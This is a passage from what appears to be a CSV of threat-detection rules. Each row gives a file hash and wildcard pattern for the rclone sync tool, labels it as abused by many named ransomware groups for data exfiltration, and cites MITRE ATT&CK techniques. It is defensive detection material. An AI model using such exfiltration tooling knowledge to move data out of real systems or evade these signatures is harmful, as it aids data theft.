- AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*b4f0256edb670edd9ee44e5884979228f558e6040e39faf4c95d010f82fda4af*",".{0,1000}b4f0256edb670edd9ee44e5884979228f558e6040e39faf4c95d010f82fda4af.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*b580a9a0c9c89c5b5ea6e120a0358756c6e880d049ae63c97aa562a1ffdddc98*",".{0,1000}b580a9a0c9c89c5b5ea6e120a0358756c6e880d049ae63c97aa562a1ffdddc98.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*b58fe1c67dd06e3e1224b3769af2d61d9cc6ba2ff4a501510a9c36836f395551*",".{0,1000}b58fe1c67dd06e3e1224b3769af2d61d9cc6ba2ff4a501510a9c36836f395551.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*b5a6cb3aef4fd1a2165fb8c21b1b1705f3cb754a202adc81931b47cd39c64749*",".{0,1000}b5a6cb3aef4fd1a2165fb8c21b1b1705f3cb754a202adc81931b47cd39c64749.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*b5f4c4d06ff3d426aee99870ad437276c9ddaad55442f2df6a58b918115fe4cf*",".{0,1000}b5f4c4d06ff3d426aee99870ad437276c9ddaad55442f2df6a58b918115fe4cf.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*b609a1cd184b98aa4f2c881c728c88387547d7e143e3bbce5a3f4c6331e239fd*",".{0,1000}b609a1cd184b98aa4f2c881c728c88387547d7e143e3bbce5a3f4c6331e239fd.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*b65532e0fd6b3431083794b77510be5bb604ccdd09b140717cb8b984e3f071f6*",".{0,1000}b65532e0fd6b3431083794b77510be5bb604ccdd09b140717cb8b984e3f071f6.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*b6a7e8314b59c535279316d0fccf6165fec70e45a66edc1fad206fb68face26c*",".{0,1000}b6a7e8314b59c535279316d0fccf6165fec70e45a66edc1fad206fb68face26c.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*b6c5fd2222bb8c16d6627a961f988fb75c4d18b0432de4c01ae494913a34a6b2*",".{0,1000}b6c5fd2222bb8c16d6627a961f988fb75c4d18b0432de4c01ae494913a34a6b2.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*b6d0f1d60596d87349f81aff517a1c340b16e68a68d72fbb568307a8a8e0a7e8*",".{0,1000}b6d0f1d60596d87349f81aff517a1c340b16e68a68d72fbb568307a8a8e0a7e8.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*b71ddababf3cb07dcf58059d117c12cbf501987bb9435811bd5380a2617324bd*",".{0,1000}b71ddababf3cb07dcf58059d117c12cbf501987bb9435811bd5380a2617324bd.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*b72dff370a3d29191e51658527bafaddbe5a6519c0cde269ffa88b2d71fbced0*",".{0,1000}b72dff370a3d29191e51658527bafaddbe5a6519c0cde269ffa88b2d71fbced0.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*b73d7349fb3446615ae20d73985b8b43edbede87eec813caf326a5b9d8b19156*",".{0,1000}b73d7349fb3446615ae20d73985b8b43edbede87eec813caf326a5b9d8b19156.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*b7632ad86179427b51fbad5f7f5a896fdf7107092db562ee04262d4f25fd1465*",".{0,1000}b7632ad86179427b51fbad5f7f5a896fdf7107092db562ee04262d4f25fd1465.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*b7716adc8baf4d206d412aec8017804099e8b210af4ca3e6040810c15b0d82ac*",".{0,1000}b7716adc8baf4d206d412aec8017804099e8b210af4ca3e6040810c15b0d82ac.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*b7778c69b9cfb944a3d1ab7ceabb2e1b13d222d40125122e30b868cf184f86eb*",".{0,1000}b7778c69b9cfb944a3d1ab7ceabb2e1b13d222d40125122e30b868cf184f86eb.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*b7c5ffe669acefd71a205c617ff4e1d66ecc58130b8c26513e818c8a35e5d658*",".{0,1000}b7c5ffe669acefd71a205c617ff4e1d66ecc58130b8c26513e818c8a35e5d658.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*b7ccc947d2e65a38eb9dd32e54c47f742ca9530e41e6ce8237c44e4d58abd601*",".{0,1000}b7ccc947d2e65a38eb9dd32e54c47f742ca9530e41e6ce8237c44e4d58abd601.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*b8001e36a089a3933fe1f04947e5f0f550532437f1cafdb7486d1479846d4a8b*",".{0,1000}b8001e36a089a3933fe1f04947e5f0f550532437f1cafdb7486d1479846d4a8b.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*b81d6ed58664ae2cbe10d5b6c166266ab7d3f359b72be00913509d24eb093c57*",".{0,1000}b81d6ed58664ae2cbe10d5b6c166266ab7d3f359b72be00913509d24eb093c57.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*b8ea3c85bf0e95653e1df9d4fa9bd268464260ec75ea9affaf84e3bf52de0ebc*",".{0,1000}b8ea3c85bf0e95653e1df9d4fa9bd268464260ec75ea9affaf84e3bf52de0ebc.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*b98f46ae8a0fa6b7ec5fb984ab5bdad6f5728ab5e2806ec2f5c90014612e3a92*",".{0,1000}b98f46ae8a0fa6b7ec5fb984ab5bdad6f5728ab5e2806ec2f5c90014612e3a92.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*b99ea0f9bbe24f200b696c365a5a6ad6ee507ed4af27f22f505af648e971cf62*",".{0,1000}b99ea0f9bbe24f200b696c365a5a6ad6ee507ed4af27f22f505af648e971cf62.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*ba7d8b6731532506b0ed79ed246562eec78498dd8123a6a1c5ec99d148eedbfb*",".{0,1000}ba7d8b6731532506b0ed79ed246562eec78498dd8123a6a1c5ec99d148eedbfb.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*ba837f975b85f993b49c134bac37dec1c2f475228f2bff0b2e64045aea1fe494*",".{0,1000}ba837f975b85f993b49c134bac37dec1c2f475228f2bff0b2e64045aea1fe494.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*babf3b67f08f5f80a2d9fdaecd7c9faa52a5eadb30daed474bdf50df21760513*",".{0,1000}babf3b67f08f5f80a2d9fdaecd7c9faa52a5eadb30daed474bdf50df21760513.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*baf423bed15c4ecb7c5df42b23aea20137154e370146e3a834eca0e4cb20c837*",".{0,1000}baf423bed15c4ecb7c5df42b23aea20137154e370146e3a834eca0e4cb20c837.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*baf4b309c7b2064aa60e2e2ceb614f321cd31d3fc1348eee349f19ef0cfbb236*",".{0,1000}baf4b309c7b2064aa60e2e2ceb614f321cd31d3fc1348eee349f19ef0cfbb236.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*bb074e0e2302d9d1b31cc2cffec35d81525bd43beee43df3679b9dd8f1e16461*",".{0,1000}bb074e0e2302d9d1b31cc2cffec35d81525bd43beee43df3679b9dd8f1e16461.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*bb453ae9686b0b7a3e0000c80811cac81b4a7fde4e5613089681b7d58cd1d6a4*",".{0,1000}bb453ae9686b0b7a3e0000c80811cac81b4a7fde4e5613089681b7d58cd1d6a4.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*bb735e934251282a349f5bf909d8d52f5a5e4c4adc2423fb4b736d110ff966e1*",".{0,1000}bb735e934251282a349f5bf909d8d52f5a5e4c4adc2423fb4b736d110ff966e1.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*bb7eb0fdbe238ae66d227a939c6ad718731881dbbe51d3be33409d3cd6276a30*",".{0,1000}bb7eb0fdbe238ae66d227a939c6ad718731881dbbe51d3be33409d3cd6276a30.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*bb80873faf22af995e0904aaabb9dad5bde417bc7c670e3bbfde0a8453bb0b00*",".{0,1000}bb80873faf22af995e0904aaabb9dad5bde417bc7c670e3bbfde0a8453bb0b00.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*bb8b44e0fab088c4f5e40878b4213ce15fa474763f1355f597b0a6ad2aa96c6d*",".{0,1000}bb8b44e0fab088c4f5e40878b4213ce15fa474763f1355f597b0a6ad2aa96c6d.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*bb8fda8566da9d054f2dde15f390d5364841c2181f4e278056569ece2fbc1d46*",".{0,1000}bb8fda8566da9d054f2dde15f390d5364841c2181f4e278056569ece2fbc1d46.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
